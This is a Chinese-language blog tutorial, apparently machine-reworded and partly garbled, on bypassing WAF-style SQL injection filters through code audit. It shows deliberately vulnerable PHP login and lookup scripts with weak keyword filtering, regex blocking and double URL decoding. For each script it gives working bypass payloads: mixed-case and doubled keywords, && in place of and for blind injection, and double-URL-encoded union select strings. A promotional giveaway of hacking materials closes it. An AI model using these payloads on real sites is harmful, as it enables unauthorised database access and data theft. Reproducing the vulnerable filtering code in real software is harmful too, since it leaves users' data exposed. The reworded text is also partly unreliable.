前言
在实质的网站中和用户的输入输出接口不可能想那样无防御办法的。此刻各大网站都在运用waf对网站或APP的业务流量进行恶意特征识别及防护,,避免网站服务器被恶意入侵。因此咱们就需要绕过waf,这篇文案就用代码审计的方式给大众讲解有些sql的绕过技巧。
关键字过滤
部分waf会对关键字进行过滤,咱们可以用体积写或双写关键字来绕过。
源代码分析<?php
require db.php;
header(Content-type:text/html;charset=utf8);
$username=dl($_POST[username]);
$password=dl($_POST[password]);
$dl="SELECT * FROM xs WHERE username=$username and password=$password"; //登录界面后台处理$ck=mysqli_query($db,$dl);
$row = mysqli_fetch_array($ck);if($_POST[login]){
if($row) {
echo"你的秘码".$row[username];
}else{
echo"登录失败";
}
}
function dl($gl){
$gl=str_replace(array("union","UNION"),"","$gl");
$gl=str_replace(array("select","SELECT"),"","$gl");
$gl=str_replace(array("database","DATABASE"),"","$gl");
$gl=str_replace(array("sleep","SLEEP"),"","$gl");
$gl=str_replace(array("if","IF"),"","$gl");
$gl=str_replace("--","","$gl");
$gl=str_replace("order","","$gl");
return $gl;
}
分析一下代码,首要获取了数据,加载dl函数以后带入了数据库中执行,而后if判定是不是有提交,是不是登录成功,登录成功后回显用户的账号,这是一个非常简单的后台登录代码。往下看有一个自定义函数dl,函数内运用了str_replace(),str_replace()的功效是替换字符串,这儿union,select,database ,if这些常用的注入字符体积写都被替换成空。做了一个简单的危险字符过滤自定义函数。
关键字过滤注入办法
用体积写和双写关键字来尝试绕过,返回代码里有回显位因此能够union注入,dl函数把union,select这些字符替换成空然则mysql中是不不区分体积写的,因此能够体积写混写来绕过dl函数的过滤。例如Select Union DAtabase()这般的字符是能够执行的。亦能够用双写的手法,比如seselectlect这般的语句, dl函数会把里面的select替换为空这般两边的字符凑在一块刚好又是一个select这般就起到了绕过的功效。
体积写绕过语句为 -1’ unioN Select dataBASE(),2 #
双写关键字绕过语句为 -1’ ununionion selecselectt databasdatabasee(),2 #
都运行成功
or and xor not过滤
or and xor not 像这般的规律运算亦会被过滤袋掉那咱们怎么绕过呢?
源代码分析<?php
require db.php;
header(Content-type:text/html;charset=utf8);
$username=dl($_POST[username]);
$password=dl($_POST[password]);
$zifu=/(and|or|xor|not)/i;
if(preg_match("$zifu","$username&&$password")){
echo "<script>alert(存在危险字符)</script>";
}
$dl="SELECT * FROM xs WHERE username=$username and password=$password"; //登录界面后台处理
$ck=mysqli_query($db,$dl);
$row = mysqli_fetch_array($ck);
if($_POST[login]){
if($row) {
echo"登录成功";
}else{
echo"登录失败";
}
}
function dl($gl){
$gl=str_replace(array("union","UNION"),"","$gl");
$gl=str_replace(array("select","SELECT"),"","$gl");
$gl=str_replace(array("database","DATABASE"),"","$gl");
$gl=str_replace(array("sleep","SLEEP"),"","$gl");
$gl=str_replace(array("if","IF"),"","$gl");
$gl=str_replace("--","","$gl");
$gl=str_replace("order","","$gl");
return $gl;
}
?>阅读一遍代码发掘在上一段的基本上面添加了一个preg_match函数,这个函数过滤了or and xor not关键字,需要重视的是preg_match会体积写都过滤,继续往下读回显位改成为了成功或失败因此咱们只能采用盲注或延时注入。
规律运算符绕过
先尝试体积写绕过,果然是失败的。
运用规律运算符尝试
and = &&
or = ||
xor = | # 异或
not = !
运用&&代替and构造盲注语句1’ && length(DATAbase())=3 # 由于关键字过滤函数还在因此还同期需要体积写绕过。
注入成功
url编码绕过
在平常运用url提交数据时,web容器在接到url后会自动进行一次url编码解析,然则因为业务问题有些网站在web容器自动解析之后,经过编写程序对解析的参数进行再次url编码解析,就会出大问题。
源代码分析<?php
require db.php;
header(Content-type:text/html;charset=utf8);
$id1=$_GET[id];
$gl="/and|or|not|xor|length|union|select|database|if|sleep|substr/i";
if(preg_match($gl,$id1)){
echo"<script>alert(存在危险字符)</script>";
}else{
$id=urldecode($id1);
$dl="SELECT * FROM xs WHERE id=$id";
$result=mysqli_query($db,$dl);
$row = mysqli_fetch_assoc($result);if($_GET[id]) {
if ($row) {
echo "登录成功:" . $row[username];
}
}}
?>
上来还是先瞧瞧代码,把客户端传入的get参数赋值进了id1,用if加preg_match对变量id1,用if加pregmatch对变量id1里的值进行检索。倘若客户端传入的参数有gl里的值那样就会返回前端代码进行警告。无危险字符才会执行下面的代码,接着把gl里的值那样就会返回前端代码进行警告。无危险字符才会执行下面的代码,接着把id1里的参数进行一次url解编码并赋值给$id。此时客户端传入的参数已然经过了两次url编码解析。最后过滤完成把id变量带入数据库中进行查找并返回用户的账号。
注入语句
分析代码时说到客户端传入的参数会进行两次url编码解析之后带入数据库,但危险过滤是在第1次解析之后第二次解析之前执行的。亦便是说咱们能够写入两次url编码过的语句绕过preg_match,例如and在过滤范围之中,对and一次url全编码后变为%61%6e%64%0,再进行一次编码为 %25%36%31%25%36%65%25%36%34
。把经过两次编码后的and提交数据会经过web容器解码后变为%61%6e%64,preg_match判定就不会触发。
构造尝试语句
把-1’ union select database(),2,3 --+编码为-1’
%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65 %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34 %25%36%34%25%36%31%25%37%34%25%36%31%25%36%32%25%36%31%25%37%33%25%36%35(),2,3 --+
成功绕过,代码执行带出了当前数据库。
最后,为了感谢广大读者伙伴的支持,准备了以下福利给到大众:
[一>获取<一]
1、200多本网络安全系列电子书(该有的都有了)
2、全套工具包(最全中文版,想用哪个用哪个)
3、100份src源码技术文档(项目学习一直,实践得真知)
4、网络安全基本入门、Linux、web安全、攻防方面的视频(2021最新版)
6、 网络安全学习路线(告别不入流的学习)
7、ctf夺旗赛解析(题目解析实战操作)
[一>关注我,私信回复“资料”获取<一]
|